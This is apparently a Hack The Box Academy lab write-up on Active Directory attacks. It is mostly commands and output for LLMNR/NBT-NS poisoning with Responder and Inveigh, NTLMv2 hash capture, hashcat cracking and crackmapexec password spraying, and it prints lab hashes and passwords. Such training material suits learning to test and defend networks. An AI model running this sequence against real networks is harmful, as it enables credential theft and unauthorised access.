LLMNR/NBT-NS & Spraying for AD Access

LLMNR/NBT-NS Poisoning with Responder (Linux)

Steps

mrci0x1@htb$ tmux new -s responder

Start Responder in Poisoning Mode

mrci0x1@htb$ sudo responder -I ens224 -wf

[+] Listening for events...
[+] Poisoning LLMNR, NBT-NS, MDNS
[+] WPAD rogue proxy server started
[+] Fingerprinting host OS/version

Monitor Captures

mrci0x1@htb$ ls /usr/share/responder/logs

Analyzer-Session.log                Responder-Session.log
Config-Responder.log                SMB-NTLMv2-SSP-172.16.5.200.txt
HTTP-NTLMv2-172.16.5.200.txt        SMB-NTLMv2-SSP-172.16.5.25.txt
Poisoners-Session.log               SMB-NTLMv2-SSP-172.16.5.50.txt
Proxy-Auth-NTLMv2-172.16.5.200.txt

View a captured hash

mrci0x1@htb$ cat /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.5.25.txt

FOREND::INLANEFREIGHT:4af70a79938ddf8a:0f85ad1e80baa52d732719dbf62c34cc:010100000000000080f519d1432cd80136f3af14556f047800000000020008004900340046004e0001001e00570049004e002d0032004e004c005100420057004d00310054005000490004003400570049004e002d0032004e004c005100420057004d0031005400500049002e004900340046004e002e004c004f00430041004c00030014004900340046004e002e004c004f00430041004c00050014004900340046004e002e004c004f00430041004c000700080080f519d1432cd80106000400020000000800300030000000000000000000000000300000227f23c33f457eb40768939489f1d4f76e0e07a337ccfdd45a57d9b612691a800a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e0035002e003200320035000000000000000000

Crack Hashes with Hashcat

mrci0x1@htb$ cp /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.5.25.txt forend_ntlmv2.txt

mrci0x1@htb$ hashcat -m 5600 forend_ntlmv2.txt /usr/share/wordlists/rockyou.txt

hashcat -m 5600 forend_ntlmv2.txt /usr/share/wordlists/rockyou.txt --show > cracked_forend.txt

LLMNR/NBT-NS Poisoning with Inveigh (PowerShell Version)

Prerequisites Check

PS C:\mrci0x1> netstat -ano | findstr ":80 :445 :389 :5355 :137"

Load Inveigh Module

PS C:\mrci0x1> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass

PS C:\mrci0x1> Import-Module C:\Tools\Inveigh.ps1

PS C:\mrci0x1> (Get-Command Invoke-Inveigh).Parameters

Key                     Value
---                     -----
ADIDNSHostsIgnore       System.Management.Automation.ParameterMetadata
KerberosHostHeader      System.Management.Automation.ParameterMetadata
ProxyIgnore             System.Management.Automation.ParameterMetadata
PcapTCP                 System.Management.Automation.ParameterMetadata
PcapUDP                 System.Management.Automation.ParameterMetadata
SpooferHostsReply       System.Management.Automation.ParameterMetadata
SpooferHostsIgnore      System.Management.Automation.ParameterMetadata
SpooferIPsReply         System.Management.Automation.ParameterMetadata

Start Inveigh Poisoning

PS C:\mrci0x1> Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -HTTP Y -FileOutput Y -FileOutputDirectory C:\Tools\Inveigh-Logs

[*] Inveigh 1.4 started...
[*] Listening for LLMNR/NBNS requests...
[+] LLMNR request for XYZ from 172.16.5.50
[+] Captured SMB NTLMv2 challenge/response from 172.16.5.50:
INLANEFREIGHT\jhermann:5b8e2c1a9f4d3e7b:1a2b3c4d5e6f7...

Check Logs

PS C:\mrci0x1> dir C:\Tools\Inveigh-Logs

-a----        6/21/2025  12:57 PM           1053 Inveigh_Log.txt

PS C:\mrci0x1> Copy-Item C:\Tools\Inveigh-Logs\Inveigh_Log.txt C:\Users\mrci0x1\Documents\

LLMNR/NBT-NS Poisoning with InveighZero (C# Version)

Launch Executable

PS C:\mrci0x1> .\Inveigh.exe

[*] Inveigh 2.0.4 [Started 2022-02-28T20:03:28 | PID 6276]
[+] Packet Sniffer Addresses [IP 172.16.5.25 ...]
[+] Listener Addresses [IP 0.0.0.0 ...]
[+] Spoofer Reply Addresses [IP 172.16.5.25 ...]
[+] LLMNR Packet Sniffer [Type A]
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[+] File Output [C:\Tools]

Interact with InveighZero

> GET NTLMV2UNIQUE

backupagent::INLANEFREIGHT:B5013246091943D7:16A41B703C8D4F8F6AF75C47C3B50CB5:...
forend::INLANEFREIGHT:32FD89BD78804B04:DFEB0C724F3ECE90E42BAF061B78BFE2:...

GET NTLMV2USERNAMES

IP Address                        Host                              Username
172.16.5.125                    | ACADEMY-EA-FILE                 | INLANEFREIGHT\backupagent
172.16.5.125                    | ACADEMY-EA-FILE                 | INLANEFREIGHT\forend
172.16.5.125                    | ACADEMY-EA-FILE                 | INLANEFREIGHT\clusteragent

STOP

Cracking Captured Hashes

PS C:\mrci0x1> hashcat.exe -m 5600 C:\Users\mrci0x1\Documents\ntlmv2_hashes.txt C:\Tools\wordlists\rockyou.txt --show | Out-File C:\Users\mrci0x1\Documents\cracked_hashes.txt

hashcat -m 5600 ~/Documents/ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt --show > ~/Documents/cracked_hashes.txt

forend::INLANEFREIGHT:32FD89BD78804B04:DFEB0C724F3ECE90E42BAF061B78BFE2:...:Klmcargo2
backupagent::INLANEFREIGHT:B5013246091943D7:16A41B703C8D4F8F6AF75C47C3B50CB5:...:Backup2024!

Password Spraying (Post-Poisoning)

echo -e "Klmcargo2\nFreight2023!\nIlovefishing!\nWinter2024!\nBackup2024!" > passwords.txt

crackmapexec smb 172.16.5.0/24 -u valid_ad_users.txt -p passwords.txt
SMB 172.16.5.10 445 INLANEFREIGHT [+] INLANEFREIGHT\admin:Winter2024!
SMB 172.16.5.50 445 INLANEFREIGHT [+] INLANEFREIGHT\backupagent:Backup2024!
SMB 172.16.5.80 445 INLANEFREIGHT [+] INLANEFREIGHT\forend:Klmcargo2

PreviousExternal and Internal Enumeration NextInternal Password Spraying Attack

Last updated 1 month ago